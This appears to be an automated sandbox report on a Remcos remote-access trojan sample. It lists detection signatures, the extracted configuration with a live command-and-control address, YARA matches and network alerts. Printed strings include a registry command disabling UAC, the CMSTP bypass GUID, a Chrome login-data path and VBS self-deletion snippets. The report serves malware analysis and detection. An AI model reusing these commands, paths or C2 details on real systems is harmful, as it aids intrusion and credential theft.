Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BiU282bjyR.exe

Overview

General Information

Sample Name:BiU282bjyR.exe
Original Sample Name:111355b58d38248c4f0d96a509ca44e5.exe
Analysis ID:1301172
MD5:111355b58d38248c4f0d96a509ca44e5
SHA1:24c5d3159af9d992a0a26368cf65ba313f3e8be4
SHA256:c67621749a60aa3546fbfb190a151ad3339d2a96a89e83491acb396709e9cb22
Tags:exeRATRemcosRAT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected UAC Bypass using CMSTP
Contains functionality to bypass UAC (CMSTPLUA)
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Contains functionality to modify clipboard data
Contains functionality to steal Chrome passwords or cookies
Contains functionalty to change the wallpaper
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Checks if the current process is being debugged
Yara detected Keylogger Generic
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to simulate mouse events
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • BiU282bjyR.exe (PID: 7076 cmdline: C:\Users\user\Desktop\BiU282bjyR.exe MD5: 111355B58D38248C4F0D96A509CA44E5)
    • WerFault.exe (PID: 6148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 840 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 844 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6576 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 888 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 892 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6816 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 884 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5236 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 844 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1052 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6948 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1220 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6312 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 912 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6908 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1252 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 7132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 912 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5436 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1416 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "212.23.211.238:27009:0", "Assigned name": "27009", "Copy file": "remcos.exe", "Mutex": "EGiy6hf-YWJYTZ", "Keylog file": "0x000000000.iep", "Take screenshot title": "notepad;solitaire;", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "Systeminfo"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.638122231.00000000007CC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6a694:$a1: Remcos restarted by watchdog!
        • 0x6ac10:$a3: %02i:%02i:%02i:%03i
        00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          Click to see the 8 entries
          SourceRuleDescriptionAuthorStrings
          0.2.BiU282bjyR.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            0.2.BiU282bjyR.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0.2.BiU282bjyR.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x653d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x6536c:$s1: CoGetObject
              • 0x65380:$s1: CoGetObject
              • 0x6539c:$s1: CoGetObject
              • 0x6f27e:$s1: CoGetObject
              • 0x6532c:$s2: Elevation:Administrator!new:
              0.2.BiU282bjyR.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6b490:$a1: Remcos restarted by watchdog!
              • 0x6ba0c:$a3: %02i:%02i:%02i:%03i
              0.2.BiU282bjyR.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x654e4:$str_a1: C:\Windows\System32\cmd.exe
              • 0x65460:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x65460:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x65960:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x66190:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x65554:$str_b2: Executing file:
              • 0x665d4:$str_b3: GetDirectListeningPort
              • 0x65f80:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x66100:$str_b7: \update.vbs
              • 0x6557c:$str_b9: Downloaded file:
              • 0x65568:$str_b10: Downloading file:
              • 0x6560c:$str_b12: Failed to upload file:
              • 0x6659c:$str_b13: StartForward
              • 0x665bc:$str_b14: StopForward
              • 0x66058:$str_b15: fso.DeleteFile "
              • 0x65fec:$str_b16: On Error Resume Next
              • 0x66088:$str_b17: fso.DeleteFolder "
              • 0x655fc:$str_b18: Uploaded file:
              • 0x655bc:$str_b19: Unable to delete:
              • 0x66020:$str_b20: while fso.FileExists("
              • 0x65a99:$str_c0: [Firefox StoredLogins not found]
              Click to see the 15 entries
              No Sigma rule has matched
              Timestamp:192.168.2.3212.23.211.23849725270092032776 08/31/23-17:57:02.741057
              SID:2032776
              Source Port:49725
              Destination Port:27009
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:212.23.211.238192.168.2.327009497252032777 08/31/23-17:57:02.818401
              SID:2032777
              Source Port:27009
              Destination Port:49725
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000000.00000002.638122231.00000000007CC000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "212.23.211.238:27009:0", "Assigned name": "27009", "Copy file": "remcos.exe", "Mutex": "EGiy6hf-YWJYTZ", "Keylog file": "0x000000000.iep", "Take screenshot title": "notepad;solitaire;", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "Systeminfo"}
              Source: BiU282bjyR.exeReversingLabs: Detection: 55%
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.2970204.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.2970204.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.638122231.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BiU282bjyR.exe PID: 7076, type: MEMORYSTR
              Source: BiU282bjyR.exeAvira: detected
              Source: 212.23.211.238Avira URL Cloud: Label: malware
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00433255 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00433255
              Source: BiU282bjyR.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

              barindex
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.2970204.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.2970204.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BiU282bjyR.exe PID: 7076, type: MEMORYSTR

              Privilege Escalation

              barindex
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00407424 _wcslen,CoGetObject,0_2_00407424

              Compliance

              barindex
              Source: C:\Users\user\Desktop\BiU282bjyR.exeUnpacked PE file: 0.2.BiU282bjyR.exe.400000.0.unpack
              Source: BiU282bjyR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040917A __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040917A
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040C1C2 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C1C2
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0044E289 FindFirstFileExA,0_2_0044E289
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041958A FindFirstFileW,FindNextFileW,FindNextFileW,0_2_0041958A
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040958C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040958C
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00407763 FindFirstFileW,FindNextFileW,0_2_00407763
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00408733 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408733
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040B9A5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B9A5
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040BBAC FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BBAC
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041BD26 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041BD26
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00407BBE SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407BBE

              Networking

              barindex
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.3:49725 -> 212.23.211.238:27009
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 212.23.211.238:27009 -> 192.168.2.3:49725
              Source: Malware configuration extractorURLs: 212.23.211.238
              Source: Joe Sandbox ViewASN Name: TMRDE TMRDE
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: global trafficTCP traffic: 192.168.2.3:49725 -> 212.23.211.238:27009
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: unknownTCP traffic detected without corresponding DNS query: 212.23.211.238
              Source: BiU282bjyR.exe, 00000000.00000003.384506320.0000000000816000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638122231.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/j
              Source: BiU282bjyR.exe, BiU282bjyR.exe, 00000000.00000003.384506320.0000000000816000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638122231.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000003.384506320.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638122231.0000000000803000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638122231.0000000000806000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638196781.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: BiU282bjyR.exe, 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: BiU282bjyR.exe, 00000000.00000003.384506320.0000000000816000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638196781.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp:8&:
              Source: BiU282bjyR.exe, 00000000.00000002.638122231.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpI
              Source: BiU282bjyR.exe, 00000000.00000003.384506320.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638122231.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/json.gpps
              Source: BiU282bjyR.exe, 00000000.00000003.384506320.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, BiU282bjyR.exe, 00000000.00000002.638122231.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpxx
              Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
              Source: unknownDNS traffic detected: queries for: geoplugin.net
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_00404B96 WaitForSingleObject,SetEvent,recv,0_2_00404B96
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004164D7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004164D7
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004164D7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004164D7
              Source: BiU282bjyR.exe, 00000000.00000002.638122231.00000000007AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_eddbfe6b-6
              Source: Yara matchFile source: Process Memory Space: BiU282bjyR.exe PID: 7076, type: MEMORYSTR
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0040A307 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,0_2_0040A307
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_004164D7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004164D7

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.2970204.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.2970204.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.BiU282bjyR.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.638122231.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BiU282bjyR.exe PID: 7076, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\BiU282bjyR.exeCode function: 0_2_0041C477 SystemParametersInfoW,0_2_0041C477

              System Summary

              barindex
              Source: 0.2.BiU282bjyR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.BiU282bjyR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.BiU282bjyR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.BiU282bjyR.exe.2970204.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.BiU282bjyR.exe.2970204.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.BiU282bjyR.exe.2970204.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.BiU282bjyR.exe.2970204.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.BiU282bjyR.exe.2970204.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.BiU282bjyR.exe.2970204.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.BiU282bjyR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.BiU282bjyR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.BiU282bjyR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000000.00000002.638302980.0000000002970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: Process Memory Space: BiU282bjyR.exe PID: 7076, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: BiU282bjyR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 0.2.BiU282bjyR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.BiU282bjyR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.BiU282bjyR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.BiU282bjyR.exe.2970204.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.BiU282bjyR.exe.2970204.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.BiU282bjyR.exe.2970204.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.BiU282bjyR.exe.2970204.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.BiU282bjyR.exe.2970204.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.BiU282bjyR.exe.2970204.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.BiU282bjyR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.BiU282bjyR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.BiU282bjyR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
